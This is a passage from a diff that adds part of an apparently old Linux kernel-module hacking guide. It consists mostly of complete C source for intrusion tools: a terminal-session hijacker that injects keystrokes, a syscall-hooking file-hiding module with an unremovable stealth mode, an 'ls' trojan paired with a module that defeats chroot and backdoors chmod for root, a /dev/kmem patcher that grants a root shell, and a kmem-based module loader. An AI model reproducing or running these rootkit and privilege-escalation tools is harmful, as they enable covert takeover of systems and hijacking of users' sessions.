+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <termios.h>
+#include <string.h>
+#include <fcntl.h>
+#include <signal.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <sys/sysmacros.h>
+
+struct termios save_termios;
+int ttysavefd = -1;
+int fd;
+
+#ifndef DEVICE_NAME
+#define DEVICE_NAME "/dev/ltap"
+#endif
+
+#define LS_SETMAJOR     0
+#define LS_SETMINOR     1
+ 
+#define LS_FLUSHBUF     2
+#define LS_TOGGLE       3
+
+void stuff_keystroke(int fd, char key)
+{
+   ioctl(fd, TIOCSTI, &key);
+}
+
+int tty_cbreak(int fd)
+{
+   struct termios buff;
+   if(tcgetattr(fd, &save_termios) < 0)
+      return -1;
+   buff = save_termios;
+   buff.c_lflag &= ~(ECHO | ICANON);
+   buff.c_cc[VMIN] = 0;
+   buff.c_cc[VTIME] = 0;
+   if(tcsetattr(fd, TCSAFLUSH, &buff) < 0)
+      return -1;
+   ttysavefd = fd;
+   return 0;
+}
+
+ char *get_device(char *basedevice)
+{
+   static char devname[1024];
+   int fd;
+
+   if(strlen(basedevice) > 128) return NULL;
+   if(basedevice[0] == '/')
+      strcpy(devname, basedevice);
+   else
+      sprintf(devname, "/dev/%s", basedevice);
+   fd = open(devname, O_RDONLY);
+   if(fd < 0) return NULL;
+   if(!isatty(fd)) return NULL;
+   close(fd);
+   return devname;
+}
+
+
+int do_ioctl(char *device)
+{
+   struct stat mystat;
+
+   if(stat(device, &mystat) < 0) return -1;
+    fd = open(DEVICE_NAME, O_RDONLY);
+   if(fd < 0) return -1;
+   if(ioctl(fd, LS_SETMAJOR, major(mystat.st_rdev)) < 0) return -1;
+   if(ioctl(fd, LS_SETMINOR, minor(mystat.st_rdev)) < 0) return -1;
+}
+
+
+void sigint_handler(int s)
+{
+   exit(s);
+}
+
+void cleanup_atexit(void)
+{
+   puts(" ");
+   if(ttysavefd >= 0)
+      tcsetattr(ttysavefd, TCSAFLUSH, &save_termios);
+}
+
+main(int argc, char **argv)
+{
+   int my_tty;
+   char *devname;
+    unsigned char ch;
+   int i;
+
+   if(argc != 2)
+   {
+      fprintf(stderr, "%s ttyname\n", argv[0]);
+      fprintf(stderr, "ttyname should NOT be your current tty!\n");
+      exit(0);
+   }
+   devname = get_device(argv[1]);
+   if(devname == NULL)
+   {
+      perror("get_device");
+      exit(0);
+   }
+   if(tty_cbreak(0) < 0)
+   {
+      perror("tty_cbreak");
+      exit(0);
+   }
+   atexit(cleanup_atexit);
+   signal(SIGINT, sigint_handler);
+   if(do_ioctl(devname) < 0)
+   {
+      perror("do_ioctl");
+      exit(0);
+   }
+   my_tty = open(devname, O_RDWR);
+   if(my_tty == -1) exit(0);
+   setvbuf(stdout, NULL, _IONBF, 0);
+   printf("[now monitoring session]\n");
+   while(1)
+   {
+      i = read(0, &ch, 1);
+      if(i > 0)
+      {
+         if(ch == 24)
+         {
+            ioctl(fd, LS_TOGGLE, 0);
+            printf("[Takeover mode toggled]\n");
+         }
+         else stuff_keystroke(my_tty, ch);
+      }
+      i = read(fd, &ch, 1);
+      if(i > 0)
+         putchar(ch);
+    }
+}
+<--> end ltread.c
+
+
+EOF
+</xmp>
+
+<H3><A NAME="A-e"></a>AFHRM - the monitor tool</h3>
+
+<b>NAME</b>            : AFHRM ( Advanced file hide & redirect module)<br>
+<b>AUTHOR</b>          : <A HREF="mailto:lcamtuf@boss.staszic.waw.pl">Michal Zalewski</a><br>
+<b>DESCRIPTION</b>     : This LKM was made especially for admins who want to
+                  control some files (passwd, for example) concerning
+                  file access. This module can monitor any fileaccess and
+                  redirect write attempts. It is also possible to do file
+                  hiding.<br>
+<b>LINK</b>            : <A HREF="http://www.rootshell.com">http://www.rootshell.com</a><br>
+
+
+
+
+<xmp>
+/*
+   Advanced file hide & redirect module for Linux 2.0.xx / i386 
+   ------------------------------------------------------------
+      (C) 1998 Michal Zalewski <lcamtuf@boss.staszic.waw.pl>
+*/
+
+#define MODULE
+#define __KERNEL__
+
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <asm/unistd.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <asm/fcntl.h>
+#include <asm/errno.h>
+#include <linux/types.h>
+#include <linux/dirent.h>
+#include <sys/mman.h>
+
+#if (!defined(__GLIBC__) || __GLIBC__ < 2)
+#include <sys/stat.h>
+#else
+#include <statbuf.h>		// What can I do?
+#endif
+
+#include <linux/string.h>
+#include "broken-glibc.h"
+#include <linux/fs.h>
+#include <linux/malloc.h>
+
+/* Hope that's free? */
+#define O_NOCHG     0x1000000
+#define O_ACCNOCHG  0x2000000
+#define O_STRICT    0x4000000
+#define O_STILL     0x8000000
+
+#define M_MAIN      0x0ffffff
+#define M_MINOR     (M_MAIN ^ O_ACCMODE)
+
+struct red {		// Redirections database entry.
+  const char *src,*dst;
+  const int flags,new_flags;
+};
+
+struct red redir_table[]={
+
+// Include user-specific choices :-)
+#include "config.h"
+
+};
+
+#define REDIRS sizeof(redir_table)/sizeof(struct red)
+
+struct dat {		// Inode database entry.
+  long ino,dev;
+  int valid;
+};
+
+int as_today,ohits,ghits,       // internal counters.
+    uhits,lhits,rhits;
+
+struct dat polozenie[REDIRS];	// Inodes database.
+
+// Protos...
+int collect(void);
+
+extern void* sys_call_table[];
+
+// Old system calls handlers (for module removal).
+int (*stary_open)(const char *pathname, int flags, mode_t mode);
+int (*stary_getdents)(unsigned int fd, struct dirent* dirp, unsigned int count);
+int (*stary_link)(const char* oldname,const char* newname);
+int (*stary_unlink)(const char* name);
+int (*stary_rename)(const char* oldname,const char* newname);
+
+int (*sys_stat)(void*,void*);
+int (*mybrk)(void*);
+
+
+// Ugly low-level hack - OH, HOW WE NEED IT :)))
+int mystat(const char* arg1,struct stat* arg2,char space) {
+  unsigned long m1=0,m2;
+  long __res;
+  char* a1;
+  struct stat* a2;
+  if (!space) {
+    // If needed, duplicate 1st argument to user space...
+    m1=current->mm->brk;
+    mybrk((void*)(m1+strlen(arg1)+1));
+    a1=(char*)(m1+2);
+    memcpy_tofs(a1,arg1,strlen(arg1)+1);
+  } else a1=(char*)arg1;
+  // Allocate space for 2nd argument...
+  m2=current->mm->brk;
+  mybrk((void*)(m2+sizeof(struct stat)));
+  a2=(struct stat*)(m2+2);
+  // Call stat(...)
+  __res=sys_stat(a1,a2);
+  // Copy 2nd argument back...
+  memcpy_fromfs(arg2,a2,sizeof(struct stat));
+  // Free memory.
+  if (!space) mybrk((void*)m1); else mybrk((void*)m2);
+  return __res;
+}
+
+// New open(...) handler.
+extern int nowy_open(const char *pathname, int flags, mode_t mode) {
+  int i=0,n;
+  char zmieniony=0,*a1;
+  struct stat buf;
+  unsigned long m1=0;
+  if (++as_today>INTERV) {
+    as_today=0;
+    collect();
+  }
+  if (!mystat(pathname,&buf,1)) for (i=0;i<REDIRS && !zmieniony;i++) if (polozenie[i].valid
+    && (long)buf.st_dev==polozenie[i].dev && (long)*((char*)&buf.st_dev+4)==polozenie[i].ino) {
+    if (redir_table[i].flags & O_STRICT) n=redir_table[i].flags & O_ACCMODE; else n=0;
+    switch(flags) {
+      case O_RDONLY:
+        if ((redir_table[i].flags & O_WRONLY) || (n & O_RDWR)) n=1;
+        break;
+      case O_WRONLY:
+        if ((redir_table[i].flags & O_RDONLY) || (n & O_RDWR)) n=1;
+        break;
+      default:
+        if (n && (n & (O_RDONLY|O_WRONLY))) n=1;
+        n=0;
+    }
+#ifdef DEBUG
+    printk("AFHRM_DEBUG: open %s (D:0x%x I:0x%x) ",redir_table[i].src, buf.st_dev, buf.st_ino);
+    printk("[%s] of: 0x%x cf: 0x%x nf: ",redir_table[i].dst, mode,redir_table[i].flags);
+    printk("0x%x rd: %d.\n", redir_table[i].new_flags, n==0);
+#endif
+    ohits++;
+    if (!n && (((redir_table[i].flags & M_MINOR) & flags) == (redir_table[i].flags & M_MINOR)))
+      if (redir_table[i].dst) {
+        flags=(((redir_table[i].new_flags & O_NOCHG) > 0)*flags) |
+	      (((redir_table[i].new_flags & O_ACCNOCHG) > 0)*(flags & O_ACCMODE)) |
+	      (redir_table[i].new_flags & M_MAIN);
+	/* User space trick */
+        m1=current->mm->brk;
+        mybrk((void*)(m1+strlen(redir_table[i].dst)+1));
+        a1=(char*)(m1+2);
+        memcpy_tofs(a1,redir_table[i].dst,strlen(redir_table[i].dst)+1);
+	pathname=a1;
+        zmieniony=1;
+      } else return -ERR;
+  }
+  i=stary_open(pathname,flags,mode);
+  if (zmieniony) mybrk((void*)m1);
+  return i;
+}
+
+
+// New getdents(...) handler.
+int nowy_getdents(unsigned int fd, struct dirent *dirp, unsigned int count) {
+  int ret,n,t,i,dev;
+  struct dirent *d2,*d3;
+  ret=stary_getdents(fd,dirp,count);
+  dev = (long)current->files->fd[fd]->f_inode->i_dev;
+  if (ret>0) {
+    d2=(struct dirent*)kmalloc(ret,GFP_KERNEL);
+    memcpy_fromfs(d2,dirp,ret);
+    d3=d2;
+    t=ret;
+    while (t>0) {
+      n=d3->d_reclen;
+      t-=n;
+      for (i=0;i<REDIRS;i++)
+        if (polozenie[i].valid && /* dev == polozenie[i].dev && */ /* BROKEN! */
+	    d3->d_ino==polozenie[i].ino && redir_table[i].dst == NULL) {
+#ifdef DEBUG
+          printk("AFHRM_DEBUG: getdents %s [D: 0x%x I: 0x%x] r: 0x%x t: 0x%x\n",
+	         redir_table[i].src,dev,d3->d_ino,ret,t);
+#endif
+	  ghits++;
+          if (t!=0) memmove(d3,(char*)d3+d3->d_reclen,t); else d3->d_off=1024;
+          ret-=n;
+        }
+      if (!d3->d_reclen) { ret-=t;t=0; }
+      if (t) d3=(struct dirent*)((char*)d3+d3->d_reclen);
+    }
+    memcpy_tofs(dirp,d2,ret);
+    kfree(d2);
+  }
+  return ret;
+}
+
+
+// New link(...) handler.
+extern int nowy_link(const char *oldname,const char *newname) {
+  int i;
+  struct stat buf;
+  if (!mystat(oldname,&buf,1)) for (i=0;i<REDIRS;i++) if (polozenie[i].valid &&
+     (long)buf.st_dev==polozenie[i].dev && ( redir_table[i].dst == NULL ||
+     redir_table[i].flags | O_STILL ) &&
+     (long)*((char*)&buf.st_dev+4)==polozenie[i].ino) {
+#ifdef DEBUG
+    printk("AFHRM_DEBUG: link %s... (D:0x%x I:0x%x).",redir_table[i].src,buf.st_dev,
+           (long)*((char*)&buf.st_dev+4));
+#endif
+       lhits++;
+       if (redir_table[i].dst) return -STILL_ERR; else return -ERR;
+     }
+  return stary_link(oldname,newname);
+}
+
+
+// New unlink(...) handler.
+extern int nowy_unlink(const char *name) {
+  int i;
+  struct stat buf;
+  if (!mystat(name,&buf,1)) for (i=0;i<REDIRS;i++) if (polozenie[i].valid &&
+     (long)buf.st_dev==polozenie[i].dev && ( redir_table[i].dst == NULL ||
+     redir_table[i].flags | O_STILL ) &&
+     (long)*((char*)&buf.st_dev+4)==polozenie[i].ino) {
+#ifdef DEBUG
+    printk("AFHRM_DEBUG: unlink %s (D:0x%x I:0x%x).",redir_table[i].src,buf.st_dev,
+           (long)*((char*)&buf.st_dev+4));
+#endif
+       uhits++;
+       if (redir_table[i].dst) return -STILL_ERR; else return -ERR;
+  }
+  return stary_unlink(name);
+}
+
+
+// New rename(...) handler.
+extern int nowy_rename(const char *oldname, const char* newname) {
+  int i;
+  struct stat buf;
+  if (!mystat(oldname,&buf,1)) for (i=0;i<REDIRS;i++) if (polozenie[i].valid &&
+     (long)buf.st_dev==polozenie[i].dev && ( redir_table[i].dst == NULL ||
+     redir_table[i].flags | O_STILL ) &&
+     (long)*((char*)&buf.st_dev+4)==polozenie[i].ino) {
+#ifdef DEBUG
+    printk("AFHRM_DEBUG: rename %s... (D:0x%x I:0x%x).",redir_table[i].src,buf.st_dev,
+           (long)*((char*)&buf.st_dev+4));
+#endif
+       rhits++;
+       if (redir_table[i].dst) return -STILL_ERR; else return -ERR;
+  }
+  return stary_rename(oldname,newname);
+}
+
+
+// Inode database rebuild procedure.
+int collect() {
+  int x=0,i=0,err;
+  struct stat buf;
+#ifdef DEBUG
+  printk("AFHRM_DEBUG: Automatic inode database rebuild started.\n");
+#endif
+  for (;i<REDIRS;i++)
+    if (!(err=mystat(redir_table[i].src,&buf,0))) {
+      polozenie[i].valid=1;
+      polozenie[i].dev=buf.st_dev;
+      polozenie[i].ino=(long)*((char*)&buf.st_dev+4);
+#ifdef DEBUG
+  printk("AFHRM_DEBUG: #%d file %s [D: 0x%x I: 0x%x].\n",x,redir_table[i].src,
+         buf.st_dev,buf.st_ino);
+#endif
+      x++;
+    } else {
+      polozenie[i].valid=0;
+#ifdef DEBUG
+     printk("AFHRM_DEBUG: file: %s missed [err %d].\n",redir_table[i].src,-err);
+  }
+  if (x!=REDIRS) {
+    printk("AFHRM_DEBUG: %d inode(s) not found, skipped.\n",REDIRS-x);
+#endif
+  }
+  return x;
+}
+
+// ********
+// MAINS :)
+// ********
+
+
+// Module startup.
+int init_module(void) {
+#ifdef HIDDEN
+  register struct module *mp asm("%ebp");
+#endif
+  int x;
+  unsigned long flags;
+  save_flags(flags);
+  cli();			// To satisfy kgb ;-)
+#ifdef HIDDEN
+  *(char*)(mp->name)=0;
+  mp->size=0;
+  mp->ref=0;
+#endif
+#ifdef VERBOSE
+  printk("AFHRM_INIT: Version " VERSION " starting.\n");
+#ifdef HIDDEN
+  register_symtab(0);
+  printk("AFHRM_INIT: Running in invisible mode - can't be removed.\n");
+#endif
+  printk("AFHRM_INIT: inode database rebuild interval: %d calls.\n",INTERV);
+#endif
+  sys_stat=sys_call_table[__NR_stat];
+  mybrk=sys_call_table[__NR_brk];
+  x=collect();
+  stary_open=sys_call_table[__NR_open];
+  stary_getdents=sys_call_table[__NR_getdents];
+  stary_link=sys_call_table[__NR_link];
+  stary_unlink=sys_call_table[__NR_unlink];
+  stary_rename=sys_call_table[__NR_rename];
+#ifdef VERBOSE
+  printk("AFHRM_INIT: Old __NR_open=0x%x, new __NR_open=0x%x.\n",(int)stary_open,(int)nowy_open);
+  printk("AFHRM_INIT: Old __NR_getdents=0x%x, new __NR_getdents=0x%x.\n",(int)stary_getdents,
+         (int)nowy_getdents);
+  printk("AFHRM_INIT: Old __NR_link=0x%x, new __NR_link=0x%x.\n",(int)stary_link,(int)nowy_link);
+  printk("AFHRM_INIT: Old __NR_unlink=0x%x, new __NR_unlink=0x%x.\n",(int)stary_unlink,
+         (int)nowy_unlink);
+  printk("AFHRM_INIT: Old __NR_rename=0x%x, new __NR_rename=0x%x.\n",(int)stary_rename,
+         (int)nowy_rename);
+#endif
+  sys_call_table[__NR_open]=nowy_open;
+  sys_call_table[__NR_getdents]=nowy_getdents;
+  sys_call_table[__NR_link]=nowy_link;
+  sys_call_table[__NR_unlink]=nowy_unlink;
+  sys_call_table[__NR_rename]=nowy_rename;
+#ifdef VERBOSE
+  printk("AFHRM_INIT: %d of %d redirections loaded. Init OK.\n",x,REDIRS);
+#endif
+  restore_flags(flags);
+  return 0;
+}
+
+
+// Module shutdown...
+void cleanup_module(void) {
+  unsigned long flags;
+  save_flags(flags);
+  cli();			// To satisfy kgb ;-)
+#ifdef VERBOSE
+  printk("AFHRM_INIT: Version " VERSION " shutting down.\n");
+#endif
+  sys_call_table[__NR_open]=stary_open;
+  sys_call_table[__NR_getdents]=stary_getdents;
+  sys_call_table[__NR_link]=stary_link;
+  sys_call_table[__NR_unlink]=stary_unlink;
+  sys_call_table[__NR_rename]=stary_rename;
+#ifdef VERBOSE
+  printk("AFHRM_INIT: Hits: open %d, getdents %d, link %d, unlink %d, rename %d. Shutdown OK.\n",
+         ohits,ghits,lhits,uhits,rhits);
+#endif
+  restore_flags(flags);
+}
+</xmp>
+
+<H3><A NAME="A-f"></a>CHROOT module trick</h3>
+
+<b>NAME</b>            : chr.c<br>
+<b>AUTHOR</b>          : FLoW/HISPAHACK<br>
+<b>DESCRIPTION</b>     : The first source represents the ls 'trojan'. The second one
+                  represents the actual module which is doing the chroot trick.<br>
+<b>LINK</b>            : <A HREF="http://hispahack.ccc.de">http://hispahack.ccc.de</a><br>
+
+
+<xmp>
+/*LS 'TROJAN'*/
+/* Sustituto para el "ls" de un ftp restringido.
+ * Carga el modulo del kernel chr.o
+ * FLoW - !H'98
+ */
+
+#include <stdio.h>
+#include <sys/wait.h>
+
+main()
+{
+int estado;
+
+printf("UID: %i EUID: %i\n",getuid(),geteuid());
+printf("Cambiando EUID...\n");
+
+setuid(0); /* Ya que wu-ftpd usa seteuid(), podemos recuperar uid=0 */
+
+printf("UID: %i EUID: %i\n",getuid(),geteuid());
+
+switch(fork())
+{
+case -1: printf("Error creando hijo.\n");
+case  0: execlp("/bin/insmod","insmod","/bin/chr.o",0);
+	 printf("Error ejecutando insmod.\n");
+	 exit(1);
+default: printf("Cargando modulo chroot...\n");
+	 wait(&estado);
+	 if(WIFEXITED(estado)!=0 && WEXITSTATUS(estado)==0) 
+	   printf("Modulo cargado!\n");
+	 else
+	   printf("Error cargando modulo.\n");
+	 break;
+}
+}
+
+
+
+/* Modulo del kernel para anular un chroot() y "retocar" chmod()
+ * FLoW - !H'98
+ * Basado en heroin.c de Runar Jensen <zarq@opaque.org>
+ */
+
+#include <linux/fs.h>
+#include <linux/module.h>
+#include <linux/malloc.h>
+#include <linux/unistd.h>
+#include <sys/syscall.h>
+
+#include <linux/dirent.h>
+#include <linux/proc_fs.h>
+#include <stdlib.h>
+
+
+static inline _syscall2(int, chmod, const char*, path, mode_t, mode);
+static inline _syscall1(int, setuid, uid_t, uid);
+ 
+extern void *sys_call_table[];
+
+int (*original_chroot)(const char *, const char*); 
+int (*original_chmod)(const char *, mode_t);
+int (*original_setuid)(uid_t);
+
+int hacked_chmod(const char *path, mode_t mode)
+{
+int err;
+
+if(mode==83) { /* chmod 123 XXX */
+  (*original_setuid)(0);
+  err=(*original_chmod)(path, 511); /* chmod 777 XXX */
+  }
+
+else {
+  err=(*original_chmod)(path, mode);
+  }
+  
+return(err);
+}
+
+int hacked_chroot(const char *path, const char *cmd)
+{
+        return(0);
+}
+
+int init_module(void)
+{
+	original_setuid = sys_call_table[SYS_setuid];
+	original_chroot = sys_call_table[SYS_chroot];
+	sys_call_table[SYS_chroot] = hacked_chroot;
+	original_chmod = sys_call_table[SYS_chmod];
+	sys_call_table[SYS_chmod] = hacked_chmod;
+        return(0);
+}
+
+void cleanup_module(void)
+{
+	sys_call_table[SYS_chroot] = original_chroot;
+	sys_call_table[SYS_chmod] = original_chmod;
+}
+</xmp>
+
+
+<H3><A NAME="A-g"></a>Kernel Memory Patching</h3>
+
+<b>NAME</b>            : kmemthief.c<br>
+<b>AUTHOR</b>          : unknown (I really tried to find out, but I found no comments)
+                  I found a similar source by daemon9 who took it from 'Unix
+                  Security: A practical tutorial'<br>
+<b>DESCRIPTION</b>     : This is a 'standard' kmem patcher, which gives you root (your
+                  user process). The system you try to exploit must permit write
+                  and read access to /dev/kmem. There are some systems that make
+                  that fault but don't rely on that.<br>
+<b>LINK</b>            : <A HREF="http://www.rootshell.com">http://www.rootshell.com</a><br>
+
+
+
+<xmp>
+/*   
+   kmem_thief
+   compile as follows:
+   cc -O kmem_thief.c -ld -o kmem_thief
+*/
+#include <stdio.h>
+#include <fcntl.h>
+#include <sys/signal.h>
+#include <sys/param.h>
+#include <sys/types.h>
+#include <sys/dir.h>
+#include <sys/user.h>
+
+struct user userpage;
+long address(), userlocation;
+
+int main(argc, argv, envp)
+        int argc;
+        char *argv[], *envp[];
+{
+        int count, fd;
+        long where, lseek();
+        fd = open( "/dev/kmem",O_RDWR);
+        if(fd < 0)
+        {
+                printf("Could not open /dev/kmem.\n");
+                perror(argv);
+                exit(10);
+        }
+        userlocation = address();
+        where = lseek(fd, userlocation, 0);
+        if(where != userlocation)
+        {
+                printf("Could not seek to user page.\n");
+                perror(argv);
+                exit(20);
+        }
+        count = read(fd, &userpage, sizeof(struct user));
+        if(count != sizeof(struct user))
+        {
+                printf("Could not read user page.\n");
+                perror(argv);
+                exit(30);
+        }
+        printf(" Current uid is %d\n", userpage.u_ruid);
+        printf(" Current gid is %d\n", userpage.u_rgid);
+        printf(" Current euid is %d\n", userpage.u_uid);
+        printf(" Current egid is %d\n", userpage.u_gid);
+        userpage.u_ruid = 0;
+        userpage.u_rgid = 0;
+        userpage.u_uid = 0;
+        userpage.u_gid = 0;
+        where = lseek(fd, userlocation, 0);
+        if(where != userlocation)
+        {
+                printf("Could not seek to user page.\n");
+                perror(argv);
+                exit(40);
+        }
+        write(fd, &userpage, ((char *)&(userpage.u_procp)) - ((char *)&userpage));
+        execle("/bin/csh", "/bin/csh", "-i", (char *)0, envp);
+}
+
+# include <filehdr.h>
+# include <syms.h>
+# include <ldfcn.h>
+
+# define LNULL ( (LDFILE *)0 )
+
+long    address ()
+{
+        LDFILE  *object;
+        SYMENT  symbol;
+        long    idx;
+        object = ldopen( "/unix", LNULL );
+        if( object == LNULL ) {
+                fprintf( stderr, "Could not open /unix.\n" );
+                exit( 50 );
+        }
+        for ( idx=0; ldtbread( object, idx, &symbol) == SUCCESS; idx++ ) {
+                if( ! strcmp( "_u", ldgetname( object, &symbol ) ) ) {
+                        fprintf( stdout, "user page is at: 0x%8.8x\n", symbol.n_value );
+                        ldclose( object );
+                        return( symbol.n_value );
+                }
+        }
+        fprintf( stderr, "Could not read symbols in /unix.\n");
+        exit( 60 );
+}
+</xmp>
+
+
+<H3><A NAME="A-h"></a>Module insertion without native support</h3>
+
+<b>NAME</b>            : kinsmod.c<br>
+<b>AUTHOR</b>          : <A HREF="mailto:silvio@big.net.au">Silvio Cesare</a><br>
+<b>DESCRIPTION</b>     : This is a very nice program which allows us to insert LKMs
+                  on system with no native module support.<br>
+<b>LINK</b>            : found it by a search on <A HREF="http://www.antisearch.com">http://www.antisearch.com</a><br>
+
+
+
+<xmp>
+/**********needed include file*/
+#ifndef KMEM_H
+#define KMEM_H
+
+#include <linux/module.h>
+#include <unistd.h>
+#include <fcntl.h>
+
+/*
+	these functions are anologous to standard file routines.
+*/
+
+#define kopen(mode) open("/dev/kmem", (mode))
+#define kclose(kd) close((kd))
+
+ssize_t kread(int kd, int pos, void *buf, size_t size);
+ssize_t kwrite(int kd, int pos, void *buf, size_t size);
+
+/*
+	ksyms initialization and cleanup
+*/
+
+int ksyms_init(const char *map);
+void ksyms_cleanup(void);
+
+/*
+	print the ksym table
+*/
+
+void ksyms_print(void);
+
+/*
+	return the ksym of name 'name' or NULL if no symbol exists
+*/
+
+struct kernel_sym *ksyms_find(const char *name);
+
+#endif
+
+
+/**********KMEM functions*/
+#include <stdio.h>
+#include <stdlib.h>
+#include <ctype.h>
+#include <string.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <stdio.h>
+#include <linux/module.h>
+#include <linux/unistd.h>
+#include "kmem.h"
+
+struct ksymlist {
+	struct ksymlist*	next;
+	struct kernel_sym	ksym;
+};
+
+struct ksymlisthead {
+	struct ksymlist*	next;
+};
+
+/*
+	the hash size must be an integral power of two
+*/
+
+#define KSYM_HASH_SIZE	512
+
+struct ksymlisthead ksymhash[KSYM_HASH_SIZE];
+
+/*
+	these functions are anologous to standard file routines.
+*/
+
+ssize_t kread(int kd, int pos, void *buf, size_t size)
+{
+	int retval;
+
+	retval = lseek(kd, pos, SEEK_SET);
+	if (retval != pos) return retval;
+
+	return read(kd, buf, size);
+}
+
+ssize_t kwrite(int kd, int pos, void *buf, size_t size)
+{
+	int retval;
+
+	retval = lseek(kd, pos, SEEK_SET);
+	if (retval != pos) return retval;
+
+	return write(kd, buf, size);
+}
+
+void ksyms_print(void)
+{
+	int i;
+
+	for (i = 0; i < KSYM_HASH_SIZE; i++) {
+		struct ksymlist *head = (struct ksymlist *)&ksymhash[i];
+		struct ksymlist *current = ksymhash[i].next;
+
+		while (current != head) {
+			printf(
+				"name: %s addr: %lx\n",
+				current->ksym.name,
+				current->ksym.value
+			);
+			current = current->next;
+		}
+	}
+}
+
+void ksyms_cleanup(void)
+{
+	int i;
+
+	for (i = 0; i < KSYM_HASH_SIZE; i++) {
+		struct ksymlist *head = (struct ksymlist *)&ksymhash[i];
+		struct ksymlist *current = head->next;
+
+		while (current != head) {
+			struct ksymlist *next = current->next;
+
+			free(current);
+			current = next;
+		}
+	}
+}
+
+int hash(const char *name)
+{
+	unsigned long h;
+	const char *p;
+
+	for (h = 0, p = name; *p; h += (unsigned char)*p, p++);
+
+	return h & (KSYM_HASH_SIZE - 1);
+}
+
+int ksyminsert(struct kernel_sym *ksym)
+{
+	struct ksymlist *node;
+	struct ksymlisthead *head;
+
+	node = (struct ksymlist *)malloc(sizeof(struct ksymlist));
+	if (node == NULL) return -1;
+
+	head = &ksymhash[hash(ksym->name)];
+
+	memcpy(&node->ksym, ksym, sizeof(*ksym));
+
+	node->next = (struct ksymlist *)head->next;
+	head->next = node;
+
+	return 0;
+}
+
+int ksyms_init(const char *map)
+{
+	char s[512];
+	FILE *f;
+	int i;
+
+	for (i = 0; i < KSYM_HASH_SIZE; i++)
+		ksymhash[i].next = (struct ksymlist *)&ksymhash[i];
+
+	f = fopen(map, "r");
+	if (f == NULL) return -1;
+
+	while (fgets(s, sizeof(s), f) != NULL) {
+		struct kernel_sym ksym;
+		char *n, *p;
+
+		ksym.value = strtoul(s, &n, 16);
+		if (n == s || *n == 0) goto error;
+
+		p = n;
+		while (*p && isspace(*p)) ++p;
+		if (*p == 0 || p[1] == 0 || p[2] == 0) goto error;
+
+		p += 2;
+		n = p;
+		while (*p && !isspace(*p)) ++p;
+		if (*p) *p = 0;
+
+		strncpy(ksym.name, n, 60);
+
+		if (ksyminsert(&ksym) < 0) goto error;
+	}
+
+	fclose(f);
+	return 0;
+
+error:
+	fclose(f);
+	ksyms_cleanup();
+	printf("--> %s\n", s);
+	return -1;
+}
+
+struct kernel_sym *ksyms_find(const char *name)
+{
+	struct ksymlist *head = (struct ksymlist *)&ksymhash[hash(name)];
+	struct ksymlist *current = head->next;
+
+	while (current != head) {
+		if (!strncmp(current->ksym.name, name, 60))
+			return &current->ksym;
+
+		current = current->next;
+	}
+
+	return NULL;
+}
+
+
+
+/**********MAIN PROGRAM : kinsmod.c*/
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <string.h>
+#include <fcntl.h>
+#include <elf.h>
+#include <getopt.h>
+#include "kmem.h"
+
+static char system_map[] = "System.kmap";
+static int error = 0;
+static int run = 0;
+static int force = 0;
+
+struct _module {
+	Elf32_Ehdr	ehdr;
+	Elf32_Shdr*	shdr;
+	unsigned long	maddr;
+	int		maxlen;
+	int		len;
+	int		strtabidx;
+	char**		section;
+};
+
+Elf32_Sym *local_sym_find(
+	Elf32_Sym *symtab, int n, char *strtab, const char *name
+)
+{
+	int i;
+
+	for (i = 0; i < n; i++) {
+		if (!strcmp(&strtab[symtab[i].st_name], name))
+			return &symtab[i];
+	}
+
+	return NULL;
+}
+
+Elf32_Sym *localall_sym_find(struct _module *module, const char *name)
+{
+	char *strtab = module->section[module->strtabidx];
+	int i;
+
+	for (i = 0; i < module->ehdr.e_shnum; i++) {
+		Elf32_Shdr *shdr = &module->shdr[i];
+
+		if (shdr->sh_type == SHT_SYMTAB) {
+			Elf32_Sym *sym;
+
+			sym = local_sym_find(
+				(Elf32_Sym *)module->section[i],
+				shdr->sh_size/sizeof(Elf32_Sym),
+				strtab,
+				name
+			);
+			if (sym != NULL) return sym;
+		}
+	}
+
+	return NULL;
+}
+
+void check_module(struct _module *module, int fd)
+{
+	Elf32_Ehdr *ehdr = &module->ehdr;
+
+	if (read(fd, ehdr, sizeof(*ehdr)) != sizeof(*ehdr)) {
+		perror("read");
+		exit(1);
+	}
+
+/* ELF checks */
+
+	if (strncmp(ehdr->e_ident, ELFMAG, SELFMAG)) {
+		fprintf(stderr, "File not ELF\n");
+		exit(1);
+	}
+
+	if (ehdr->e_type != ET_REL) {
+		fprintf(stderr, "ELF type not ET_REL\n");
+		exit(1);
+	}
+
+	if (ehdr->e_machine != EM_386 && ehdr->e_machine != EM_486) {
+		fprintf(stderr, "ELF machine type not EM_386 or EM_486\n");
+		exit(1);
+	}
+
+	if (ehdr->e_version != EV_CURRENT) {
+		fprintf(stderr, "ELF version not current\n");
+		exit(1);
+	}
+}
+
+void load_section(char **p, int fd, Elf32_Shdr *shdr)
+{
+	if (lseek(fd, shdr->sh_offset, SEEK_SET) < 0) {
+		perror("lseek");
+		exit(1);
+	}
+
+	*p = (char *)malloc(shdr->sh_size);
+	if (*p == NULL) {
+		perror("malloc");
+		exit(1);
+	}
+
+	if (read(fd, *p, shdr->sh_size) != shdr->sh_size) {
+		perror("read");
+		exit(1);
+	}
+}
+
+void load_module(struct _module *module, int fd)
+{
+	Elf32_Ehdr *ehdr;
+	Elf32_Shdr *shdr;
+	char **sectionp;
+	int slen;
+	int i;
+
+	check_module(module, fd);
+
+	ehdr = &module->ehdr;
+	slen = sizeof(Elf32_Shdr)*ehdr->e_shnum;
+
+	module->shdr = (Elf32_Shdr *)malloc(slen);
+	if (module->shdr == NULL) {
+		perror("malloc");
+		exit(1);
+	}
+
+	module->section = (char **)malloc(sizeof(char **)*ehdr->e_shnum);
+	if (module->section == NULL) {
+		perror("malloc");
+		exit(1);
+	}
+
+	if (lseek(fd, ehdr->e_shoff, SEEK_SET) < 0) {
+		perror("lseek");
+		exit(1);
+	}
+
+        if (read(fd, module->shdr, slen) != slen) {
+                perror("read");
+                exit(1);
+        }
+
+	for (
+		i = 0, sectionp = module->section, shdr = module->shdr;
+		i < ehdr->e_shnum;
+		i++, sectionp++
+	) {
+		switch (shdr->sh_type) {
+		case SHT_NULL:
+		case SHT_NOTE:
+		case SHT_NOBITS:
+			break;
+
+		case SHT_STRTAB:
+			load_section(sectionp, fd, shdr);
